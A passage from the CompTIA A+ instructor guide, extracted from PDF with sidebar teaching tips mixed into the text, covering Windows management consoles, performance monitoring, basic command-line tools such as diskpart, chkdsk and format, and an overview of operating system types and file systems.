mode using the Clean up system files option to reclaim data from caches such as
Windows Update and Defender.
Task Scheduler
Show The Task Scheduler (tasksch.msc) runs commands and scripts automatically.
Slide(s) Many of Windows’s processes come with predefined schedules. Tasks can be run
Task Scheduler once at a future date or time or according to a recurring schedule. A task can be a
simple application process (including switches, if necessary) or a batch file or script.
Teaching Other features include:
Tip • A trigger can be an event rather than a calendar date/time. For example, a task
Note that Windows can be set to run when the user signs in or when the machine wakes from sleep
creates numerous
or hibernation.
tasks by default.
• Each task can include multiple actions.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 371
Task Scheduler showing a Dell Support auto update task configured to run each week.
(Screenshot courtesy of Microsoft.)
Apart from defining the path to the file or script you want to execute and defining
a trigger, you should also enter the credentials that the task will run under—if the
selected user account does not have sufficient permissions, the task will not run.
Local Users and Groups console showing default security groups. Adding a user account
as a member of the Administrators group gives the account full privileges.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
372 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Users, groups, and sharing/permissions are covered in more detail later in the course.
Certificate Manager
Show A digital certificate is a means of proving the identity of a subject, such as a user,
Slide(s) computer, or service. The validity of each certificate is guaranteed by the issuing
Certificate Manager certification authority (CA). The Certificate Manager console (certmgr.msc) shows
which certificates have been installed and provides a mechanism for requesting and
Teaching importing new certificates.
Tip The tool displays many subfolders, but the most widely used are:
Just summarize
the function of this • The Personal folder stores the certificates that have been issued to the user
console without trying account. User certificates can be used for tasks such as authenticating to a
to explain encryption/ network access server, encrypting data, and adding a digital signature to a
certificate concepts document or message to prove its authenticity.
too deeply.
• Trusted Root Certification Authorities contains a superset of the certificates of
all issuers that are trusted, including Microsoft’s own CA root, local enterprise
CAs and third-party CAs. Most of these certificates are managed via Windows
Update.
Using Certificate Manager to view certificates for the current user. The trusted root
certificates added here allow the computer to trust any subject certificates issued
by these CAs. Note that as these are root certificates, each is issued to the
organization by itself. (Screenshot courtesy of Microsoft.)
certmgr.msc manages certificates for the current user. There is also a computer
certificate store, which can be managed via certlm.msc.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 373
Using Group Policy Editor to view the local password policy. This computer does not have a strong
set of policies. (Screenshot courtesy of Microsoft.)
The Local Security Policy editor (secpol.msc) can be used to modify security settings
specifically.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
374 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Registry Editor
Show The Windows registry provides a remotely accessible database for storing operating
Slide(s) system, device, and software application configuration information. You can use the
Registry Editor Registry Editor (regedit.exe) to view or edit the registry.
Teaching
Registry Keys
Tip The registry is structured as a set of five root keys that contain computer and user
Explain the difference databases. The HKEY_LOCAL_MACHINE (HKLM) database governs system-wide
between the computer settings. The HKEY_USERS database includes settings that apply to individual user
(HKLM) and user profiles, such as desktop personalization. HKEY_CURRENT_USER is a subset of
root keys and the
relationship between HKEY_USERS with the settings for logged in user.
HKU and HKCU. Note
that value entries can
have different data
types.
The "H" in "HKEY“
stands for "Handle to."
Registry root keys. Troubleshooting and editing activity is usually focused on either HKLM or HKCU.
(Screenshot courtesy of Microsoft.)
The registry database is stored in binary files called hives. A hive comprises a
single file (with no extension), a .LOG file (containing a transaction log), and a .SAV
file (a copy of the key as it was at the end of setup). The system hive also has an
.ALT backup file. Most of these files are stored in the C:\Windows\System32\Config
folder, but the hive file for each user profile (NTUSER.DAT) is stored in the folder
holding the user’s profile.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 375
If you want to copy portions of the registry database and use them on other
computers, select File > Export Registry File. The file will be exported in a registry-
compatible format and can be merged into another computer’s registry by double-
clicking the file (or calling it from a script).
Adding a snap-in to a custom console. This custom console can be used to manage both personal
and computer certificates on the local host. (Screenshot courtesy of Microsoft.)
Most MMC snap-ins can be used to manage either the local computer or a remote
computer (a computer elsewhere on the network).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
376 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Management Consoles
3
The icon indicates that the device has been disabled. It could be that there was a
fault, or there may be a network configuration or security reason for disabling the
adapter. In this sort of situation, use incident logs and device documentation to
establish the reason behind the configuration change.
False. While solid state drives (SSDs) and hard disk drives (HDDs) have different
mechanical and performance characteristics, it is still necessary to run the
Defragment and Optimize Drives (dfrgui.exe) periodically to optimize performance.
5. In Windows, what is the difference between the boot partition and the
system partition?
The system partition contains the boot files; the boot partition contains the system
root (OS files). The boot partition is normally assigned the drive letter C. The system
partition is not normally assigned a drive letter.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 377
Topic 11B
Use Performance and
Troubleshooting Tools
6
Diagnosing the cause of errors and performance issues can be a difficult and Teaching
frustrating task, but it can be made easier by knowing how to gather relevant Tip
information. If you can learn to use the system audit and monitoring/logging tools, This topic covers
you will be much better prepared to resolve slow performance problems. the main graphical
tools that technicians
use to monitor
System Information and troubleshoot
Windows.
The System Information (msinfo32.exe) tool produces a comprehensive report
about the system’s hardware and software components. Running the tool produces Show
an inventory of system resources, firmware and OS versions, driver file locations, Slide(s)
environment variables, network status, and so on. System Information
Teaching
Tip
Explain that this is
used as a repository
of key support
information.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
378 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Event Viewer
Show When Windows detects a problem, it will usually generate an error message. This
Slide(s) makes troubleshooting simpler as you may only need to find out what the error
Event Viewer message means using the Microsoft Knowledge Base (support.microsoft.com) or
third-party support sites and forums.
Teaching
The Event Viewer (eventvwr.msc) is a management console snap-in for viewing
Tip
and managing logs on a Windows host. The default page shows a summary of
Explain how logs and system status, with recent error and warning events collected for viewing. The left-
events are organized
in terms of destination
hand pane groups log files into different categories.
files, event sources, With a log file selected, the three-part middle pane lets you see the details of the
event types, and so
selected event without having to open a separate dialog. The third pane contains
on. You might want to
note that PowerShell useful tools for opening log files, filtering, creating a task from an event, and so on.
is probably a better
tool for searching and
filtering events.
• The Security log holds the audit data for the system.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 379
Each log file has a default maximum size (usually about 20 MB), but you can change
this by selecting Properties on the appropriate log. This option also allows the
overwrite option to be set either as overwrite, do not overwrite, or archive (close
the current file and start a new one).
Be careful about preserving logs. Many computers have ample free disk space, but
archive logs can grow very large if left unmonitored.
There are many other logs stored under the Applications and Services Logs node.
You would investigate these when troubleshooting a particular Windows feature,
service, or third-party application.
• Error—A less severe issue that should be investigated once critical issues have
been resolved.
More information for each event can be displayed by double-clicking the event in
question. This displays a screen that contains a full description of the event.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
380 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The shortcut menu for a process allows you to end a task. There is also an option
to search for information about the process online. Another option is to view more
information about a process via the Details tab. For example, some background
services run within the context of a process wrapper. You can identify services
associated with each process via the shortcut menu on the Details tab.
In some circumstances, you may want to privilege one task over another or,
conversely, set one task to have fewer resources than others. You can do this by
right-clicking the process and choosing an option from the Set Priority submenu.
For example, if you had a Voice over IP application and its priority was not already
set to Above normal, changing its priority might improve call quality as the CPU
would privilege that process over ones set to any other level.
Teaching
Tip
There’s lots of
complex detail to
unpack for each
system component. If
you have time, explain
some of the report
parameters.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 381
Performance tab in Task Manager showing CPU utilization. (Screenshot courtesy of Microsoft.)
Memory Monitoring
The Memory page reports which slots have modules installed and the speed. The
usage statistics are broken down as follows:
• In use refers to system (RAM) usage only.
• Committed reports the amount of memory requested and the total of system
plus paged memory available. Paged memory refers to data that is written to a
disk pagefile.
• Paged pool and non-paged pool refer to OS kernel and driver usage of
memory. Paged usage is processes that can be moved to the pagefile, while
non-paged is processes that cannot be paged.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
382 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
High physical memory utilization up to the amount of system RAM isn’t necessarily
a sign of poor performance as it’s good to make full use of the resource. High
pagefile utilization is more problematic.
Disk Monitoring
The Disk pages report the type and capacity plus statistics for active time, response
time, and read/write speeds.
Note that utilization is measured across all disk devices. For example, 50% utilization
could mean one disk working at 100% and the other seeing no activity.
High disk utilization and slow response times are a common cause of poor overall
system performance issues. This could be a result of slow HDD technology,
excessive paging activity, file/cache corruption, or a faulty device with bad
sectors/blocks.
Network Monitoring
The Ethernet or Wi-Fi tab reports send and receive throughput for the active
network adapter plus the IP address and hardware (MAC) interface address. If a
wireless adapter is active, the SSID, connection type (802.11 standard), and signal
strength are also shown.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 383
From Task Manager, the Open Services button links to the Services (services.msc)
console. You can use this to disable nonessential services to improve performance
or security. You can prevent a service from running at startup by setting it to
Manual or prevent it from running completely by setting it to Disabled. Note that
this may cause problems if other services depend upon it.
If something is not working properly, you should check that any services
it depends upon are started. Restarting a service can be an effective first
troubleshooting step.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
384 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Performance Monitor
Windows Performance Monitor (perfmon.msc) can be used to provide real-time
charts of system resources or can be used to log information to a file for long-term
analysis.
By monitoring different resources at different times of the day, you can detect
bottlenecks in a system that are causing problems. It may be that a particular
application starts freezing for longer and longer periods. This could be caused
by a number of things. Perhaps the processor is too slow, which would cause the
requests to take longer; perhaps the hard disk is too slow, which would mean that
it takes too long for the computer to open and save files; perhaps the application
uses a network link that has become faulty or congested.
The performance of the computer could be increased by upgrading any or all of
these components, but Performance Monitor will help you decide which is critical.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 385
In Performance Monitor, you can create log files, referred to as Data Collector Sets,
to record information for viewing later. You can generate a library of performance
measurements taken at different times of the day, week, or even year. This
information can provide a system baseline and then be used to give a longer-term
view of system performance.
There are two types of logs: counter and trace:
• Counter logs allow you to collect statistics about resources, such as memory,
disk, and processor. These can be used to determine system health and
performance.
• Trace logs can collect statistics about services, providing you with detailed
reports about resource behavior. In essence, trace logs provide extensions to the
Event Viewer, logging data that would otherwise be inaccessible.
Saved log files can be loaded into Performance Monitor from the Reports folder for
analysis or exported to other programs.
Performance Counters
To configure a counter log, you need to select what to monitor in the report. In Show
Performance Monitor, resources such as memory and disk are collected into Slide(s)
objects. Objects have counters that represent different performance statistics, Performance Counters
and there can be multiple instances of the same type of object. For example,
disk performance can be measured using the Physical Disk Object, and a useful Teaching
counter is the Average Queue Length. If there are two disks, three instances of this Tip
object can be viewed: disk 0, disk 1, and disks Total. This section might be
going a bit beyond the
syllabus objectives,
but technicians
should have a basic
appreciation of which
counters to select to
measure different
aspects of system
performance.
Using Performance Monitor to record three counters from the PhysicalDisk and Memory objects.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
386 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 387
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
388 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The Boot tab lets you configure basic settings in the Boot Configuration Data
(BCD) store. You can change the default OS, add boot options (such as Safe Mode
boot) with minimal drivers and services, and set the timeout value—the duration for
which the boot options menu is displayed. To add boot paths, you have to use the
bcdedit command.
If you are troubleshooting a system that keeps using safe boot or boots to a command
prompt, check that one of the previous options has not been made permanent in
System Configuration.
You can also log boot events. This boot log file is saved to %SystemRoot%\
ntbtlog.txt. It is not shown in Event Viewer.
The Services tab lets you choose specifically which services are configured
to run at startup. The date that a service was disabled is also shown, to make
troubleshooting easier. The Tools tab contains shortcuts to various administrative
utilities, including System Information, Registry Editor, Performance Monitor, and
so on.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 389
Review Activity:
Performance and
Troubleshooting Tools
7
1. Identify how to open the tool shown in this exhibit. What single word
Teaching
command can you use to open the tool shown in the exhibit? How can
Tip
this tool assist with troubleshooting?
Take some time at
the end of each topic
to answer questions.
You can use the
review questions
for discussion in
class or set them for
students to complete
individually during or
after class.
Run the System Information tool using the msinfo32 command. This tool produces
a comprehensive hardware and software inventory report. This configuration and
version information will be useful for many troubleshooting tasks.
2. You take a support call where the user doesn’t understand why a
program runs at startup when the Startup folder is empty. What is the
likely cause, and how could you verify this?
The program has added a registry entry to run at startup. You could check this (and
optionally disable the program) by using Task Manager.
3. You are monitoring CPU Usage and notice that it often jumps to 100%
and then falls back. Does this indicate a problem?
Probably not—CPU Usage usually peaks and falls. If it stays over 80–90%, the
system could require a faster CPU, or if it spikes continually, there could be a faulty
application.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
390 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
4. You have a computer with two SATA disks. You want to evaluate
the performance of the primary disk. How would you select this in
Performance Monitor, and what might be appropriate counters to use?
Select the Physical Disk object, select the counter, and then select the 0 C: instance.
Counters that are useful for evaluating performance include % Disk Time and
Average Disk Queue Length.
No—it shows the system is using the pagefile intensively and could benefit from
more system RAM being installed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 391
Topic 11C
Use Command-line Tools Show
Slide(s)
Use Command-line
6
Tools
CORE 2 EXAM OBJECTIVES COVERED
1.2 Given a scenario, use the appropriate Microsoft command-line tool. Teaching
Tip
This topic introduces
the command prompt
As an administrator, you will manage the computer through a GUI for some tasks
and covers all the
and through a command-line interface for others. You should also know how to “local” commands.
perform file management at the command prompt as well as the GUI. Network commands
are covered later.
Command Prompt
You can run any command from the Run dialog. However, to input a series of Show
commands or to view output from commands, you need to use the command Slide(s)
shell. The cmd.exe shell processes the legacy command set that has been part of Command Prompt
Windows since its earliest versions.
Teaching
You can run the legacy commands at a modern Windows PowerShell prompt too. In Tip
Windows 11, the command interface is redesigned as the Windows Terminal.
Make sure students
understand the
concept of running
the prompt as
Administrative Command Prompt administrator. UAC
means that logging
You may need to run the command prompt with elevated privileges to execute a on as administrator is
command. If a command cannot be run with standard privileges, the error message not sufficient. Explain
how to distinguish a
“The requested operation requires elevation.” is displayed. regular prompt from
an administrative one.
We will cover
PowerShell in a little
more detail in the
topic on scripting.
Explain that the
cmd.exe commands
covered here can be
executed in either
environment.
Note that Windows 11
introduces a new
Trying to run a command that requires elevation. You must open a new command prompt window Windows Terminal
as administrator. (Screenshot courtesy of Microsoft.) where you can select
between PowerShell,
cmd, and the Azure
You cannot continue within the same window. You need to open a new command prompts.
command prompt as administrator. Right-click the command prompt shortcut,
select Run as administrator, and then confirm the user access control (UAC)
prompt. Alternatively, type cmd in the Instant Search box, and then press
CTRL+SHIFT+ENTER.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
392 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
When run as administrator, the title bar shows “Administrator: Command Prompt”,
and the default folder is C:\Windows\System32 rather than C:\Users\Username.
You can use this technique to open other utilities such as Explorer or Notepad with
administrative privileges.
Command Syntax
To run a command, type it at the prompt (>) using the command name and any
switches and arguments using the proper syntax. When you have typed the
command, press ENTER to execute it.
The syntax of a command lists which arguments you must use (plus ones that are
optional) and the effect of the different switches. Switches are usually preceded by
the forward slash escape character.
As you enter commands, the prompt fills up with text. If this is distracting, you can
use the cls command to clear the screen.
Some commands, such as nslookup or telnet, can operate in interactive
mode. This means that using the command starts that program, and from that
point, the prompt will only accept input relevant to the program. To exit the
program, you use the exit or quit command (or press CTRL+C). The exit
command will close the cmd window if not used within an interactive command.
Getting Help
The command prompt includes a rudimentary help system. If you type help at the
command prompt and then press ENTER, a list of available commands is displayed. If
you enter help Command, the help system lists the syntax and switches used for the
command. You can also display help on a particular command by using the /? switch.
For example, netstat /? displays help on the netstat command.
Navigation Commands
Show The string before > in the command prompt shows the working directory path.
Slide(s) Commands will operate on the contents of the working directory unless a different
Navigation Commands absolute or relative path is specified as an argument.
While Windows uses the backslash to delimit directories, if you type a path using
forward slashes in Explorer or at the command prompt, it will still be interpreted
correctly. The Linux file system uses forward slashes.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 393
Another useful switch is /a:x, which displays files with the attribute indicated by x
(r for Read-only, h for hidden, s for system, and a for archive).
A wildcard character allows you to use unspecified characters with the command. A
question mark (?) means a single unspecified character. For example, the command
dir ????????.log will display all .log files with eight characters in the
file name.
• If the current directory is C:\Users\David and you want to change to the root
directory of the drive, enter: cd \
• If the current directory is C:\Users and you want to change to C:\Windows, enter:
cd \Windows
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
394 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Creating a Directory
To create a directory, use the md command. For example, to create a directory
called Data in the current directory, type md Data. To create a directory called
Docs in a directory called Data on the A drive, when the current path is C:\, type
md A:\Data\Docs
Folder and file names cannot contain the reserved characters: \ / : * ? " < > |
Removing a Directory
To delete an empty directory, enter rd Directory or rmdir Directory. If
the directory is not empty, you can remove files and subdirectories from it using
the /s switch. You can also use the /q switch to suppress confirmation messages
(quiet mode).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 395
2. Enter detail disk to display configuration information for the disk. The
utility should report that the partitions (or volumes) are healthy. If diskpart
reports that the hard disk has no partitions, the partition table may have
become corrupted.
The diskpart program showing a hard disk partition structure. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
396 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The Disk Management tool prevents you from completing certain destructive actions,
such as deleting the system or boot volume. diskpart is not restricted in this way, so use
it with care.
Both standard and quick format operations remove references to existing files in the
volume boot record, but the actual sectors are not "scrubbed" or zeroed. Existing
files will be overwritten as new files are added to the volume, but in principle, data
can be recovered from a formatted disk (using third-party tools). A secure format
utility prevents this by overwriting each sector with a zero value, sometimes using
multiple passes.
Check Disk cannot fix open files, so you may be prompted to schedule the scan for
the next system restart.
chkdsk /f and chkdsk /r can take a long time to run. Canceling a scan is not
recommended. Run a read-only scan first.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 397
• Log off (shutdown /l)—Close all open programs and services started under
the user account, but leave the computer running.
System files (and shared program files) are maintained, and version-controlled in the
WINSxS system folder. This means that the product media is not called upon, but the
WINSxS folder can consume quite a lot of disk space.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
398 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Version refers to a feature update via a year/month code representing the time
of release, such as 1607 (July 2016) or 21H1 (first half of 2021).
• OS Build is a two-part numeric value with the first part representing the
brand plus feature update and the second rev part representing quality
update status (patches). You can use the rev number to look up changes and
known issues associated with the update in the Microsoft Knowledge Base
(support.microsoft.com).
While winver has its place, the About settings page is more informative as it also lists the
edition and license information.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 399
Review Activity:
Command-line Tools
7
3. Is the command format d: /fs:exfat /q valid? If so, what is its effect, and
what precaution might you need to take before running it?
Yes, it is valid. It formats drive D with the exFAT file system by using a quick format
(does not scan for bad sectors). This will delete the file table on the drive so existing
data files can be overwritten—the formatted drive will appear to be empty in
Explorer. If there are existing files that need to be preserved, they should be backed
up before running the format command.
At a command prompt, run chkdsk without any switches. Note that sfc is not the
correct answer as this verifies the integrity of protected system files rather than
checks the file system on a drive.
5. Why might you run the shutdown command with the /t switch?
To specify a delay between running the command and shutdown starting. You
might do this to give users a chance to save work or to ensure that a computer is
restarted overnight.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
400 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 11
Summary
6
Show You should be able to use management consoles and command-line utilities to
Slide(s) manage Windows users, devices, apps, and performance.
Summary
Guidelines for Managing Windows
Teaching Document standard procedures and work instructions to make best use of
Tip Windows management consoles and command-line utilities for different tasks:
Try to include some
time at the end • Use Device Manager, Disk Management, Disk Defragmenter, Disk Cleanup,
of each lesson to chkdsk, diskpart, and format to ensure hardware availability, reliability, and
check students' performance.
understanding and
answer questions. • Use Local Users and Groups and Certificate Manager to manage users, personal
digital certificates, and trusted root certificates.
• Use Group Policy Editor and Registry Editor for fine-grained settings
configuration.
• Use System Information, Event Viewer, and winver to audit software and
hardware inventory and monitor logs.
• Use cd, dir, md, rmdir, x:, copy, xcopy, and robocopy to manage the file system
from the command prompt.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 12
Identifying OS Types and Features
1
LESSON INTRODUCTION
While the early lessons in this course have focused on Windows 10, there is a much Show
wider range of operating systems available. Even with Windows, there are various Slide(s)
editions to target different market sectors. There are also operating systems Objectives
designed to support specific hardware types, such as mobile devices. Being able to
compare and contrast OS types, versions, and editions will prepare you to support Teaching
users in a variety of different environments. Tip
With this lesson, we
start to broaden the
Lesson Objectives focus from Windows
to discuss OS support
In this lesson, you will: in more general terms.
• Explain OS types.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
402 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 12A
Show
Slide(s)
Explain OS Types
Explain OS Types
2
Microsoft Windows
Microsoft Windows covers all four of the market segments:
• Windows 10 and Windows 11 are released in different editions to support
business workstation and home PC use. They support a touch interface for use
on tablets and laptops (attempts to produce Windows smartphones have been
abandoned, however).
• Windows Server 2019 and Windows Server 2022 are optimized for use as
NOSs. They share the same underlying code and desktop interface as the client
versions, however.
Apple macOS
macOS is only supplied with Apple-built workstations (Apple Mac desktops and
Apple iMac all-in-ones) and laptops (Apple MacBooks). You cannot purchase macOS
and install it on an ordinary PC. This helps to make macOS stable but does mean
that there is far less choice in terms of buying extra hardware.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 403
macOS is re-developed from the kernel of another type of operating system called
UNIX. This kernel is supplemented with additional code to implement the Mac’s
graphical interface and system utilities. macOS supports the Magic Trackpad touch
input device, but there is no support for touch screens.
macOS gets periodic version updates that are released to Mac owners at no cost.
At the time of writing, supported versions are 10.15 (Catalina), 11 (Big Sur), and
12 (Monterey). As there is a tight link between the models of Mac computers and
the OS, Apple makes specific limitations about whether a new version of macOS
can be installed to a Mac computer. Check support.apple.com for the technical
specification for any particular macOS release.
UNIX is a trademark for a family of operating systems originally developed at Bell Teaching
Laboratories in the late 1960s. All UNIX systems share a kernel/shell architecture. Tip
The kernel is the low-level code that mediates access to system resources (CPU, Contrast the open-
RAM, and input/output devices) for other processes installed under the OS. source model with
Interchangeable shells run on the kernel to provide the user interface. Unlike the closed-source
Windows and macOS, UNIX is portable to a huge range of different hardware licensing imposed by
Microsoft and Apple.
platforms; versions of UNIX can run on everything from personal computers to
mainframes and on many types of computer processors. Explain the difference
between the Linux
Linux kernel and Linux
distributions, and
give an overview of
Originally developed by Linus Torvalds, Linux is a fully open-source OS kernel,
the principal distros.
derived from UNIX. As with other operating systems, the Linux kernel is bundled Emphasize that some
with multiple additional features, such as a shell command interpreter, desktop distributions use
window environment, and app packages. Unlike Windows and macOS, there are commercial support
lots of different Linux distributions (distros), with each maintaining its own set contracts.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
404 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
of packages. Examples of notable distros include SUSE, Red Hat, Fedora, Debian,
Ubuntu, Mint, and Arch. Distros can use different licensing and support options. For
example, SUSE and Red Hat are subscription-based, while Ubuntu is free to install
but has paid-for enterprise support contracts, and Fedora, Debian, Mint, and Arch
are community supported.
Ubuntu Linux desktop with apps for package and file management open.
• The rolling release model means that updates are delivered once the distro
owner considers them to be stable. There is no distinction between versions.
Linux can be used as a desktop or server OS. Apache, IBM, and Sun/Oracle are among
Teaching the vendors producing end-user and server applications for Linux. As a desktop OS,
Tip Linux tends to be used in schools and universities more than in businesses or in
Note that Chrome OS homes. As a server OS, it dominates the market for web servers. It is also used very
is a particular Linux widely as the OS for “smart” appliances and Internet of Things (IoT) devices.
distribution designed
by Google to work Chrome OS
principally as a client
for web apps, rather Chrome OS is derived from Linux via an open-source OS called Chromium. Chrome
than a host for locally OS itself is proprietary. Chrome OS is developed by Google to run on specific laptop
installed apps. The
(Chromebook) and PC (Chromebox) hardware. This hardware is designed for the
Chromebook range
is hardware designed budget and education markets.
to run Chrome OS Chrome OS was primarily developed to use web applications. In a web application,
(though the OS is
open-source and can the software is hosted on a server on the Internet, and the client connects to it
be installed to any using a browser. The client computer does not need to be particularly powerful
compatible platform). as the server does most of the processing. Chrome OS provides a minimal
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 405
environment compared to Windows. This means that there is less chance of some
other software application or hardware device driver interfering with the function of
the browser.
There are also “packaged” apps available for use offline, and Chrome OS can run
apps developed for Android.
iOS 15 running on an iPad. (Screenshot reprinted with permission from Apple Inc.)
New versions are released approximately every year, with version 15 current at the
time of writing. Apple makes new versions freely available, though older hardware
devices may not support all the features of a new version or may not be supported
at all. As with macOS, update limitations are published at support.apple.com.
Apple iPadOS
The iPadOS has been developed from iOS to support the functionality of the latest
iPad models (2019 and up). The principal advantage of iPadOS over iOS is better
support for multitasking (using more than one app at once) and the Apple Pencil
stylus device. Versions of iPadOS are released in parallel with iOS.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
406 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
AndroidTM
Android is a smartphone/tablet OS developed by the Open Handset Alliance, primarily
driven by Google. Unlike iOS, it is an open-source OS, based on Linux. The software
code is made publicly available. This means that there is more scope for hardware
vendors, such as Acer, Asus, HTC, LG, Motorola, OnePlus, Oppo, Samsung, Sony, and
Xiaomi to produce specific versions for their smartphone and tablet models.
Show
Slide(s)
Windows File System
Types
Teaching
Tip
Explain the
addressing, Android 11 home screen. (Screenshot courtesy of Android platform.)
journaling, and
encryption features
that distinguish At the time of writing, supported Android versions range from 9 (Pie) to 12. Because
“modern” filesystems handset vendors produce their own editions of Android, device compatibility for
from legacy ones. A new versions is more mixed compared with iOS. End-of-life policies and update
volume hosting an restrictions for particular handsets are determined by the handset vendor rather
OS (boot volume) or than any kind of overall Android authority.
application/backup/
logging system
requires these Windows File System Types
features. Removable
media may need to High-level formatting prepares a partition on a disk device for use with an operating
prioritize compatibility system. The format process creates a file system on the disk partition. Each OS is
(e.g., a digital camera associated with types of file system.
is not likely to support
a memory card New Technology File System
formatted using NTFS).
You might also want to The New Technology File System (NTFS) is a proprietary file system developed by
mention that Resilient Microsoft for use with Windows. It provides a 64-bit addressing scheme, allowing
File System (ReFS) is for very large volumes and file sizes. In theory, the maximum volume size is 16
being developed as Exabytes, but actual implementations of NTFS are limited to between 137 GB and
a replacement for
NTFS. ReFS is only
256 Terabytes, depending on the version of Windows and the allocation unit size.
available for Pro for The key NTFS features are:
Workstations and
• Journaling—When data is written to an NTFS volume, it is re-read, verified, and
Enterprise editions,
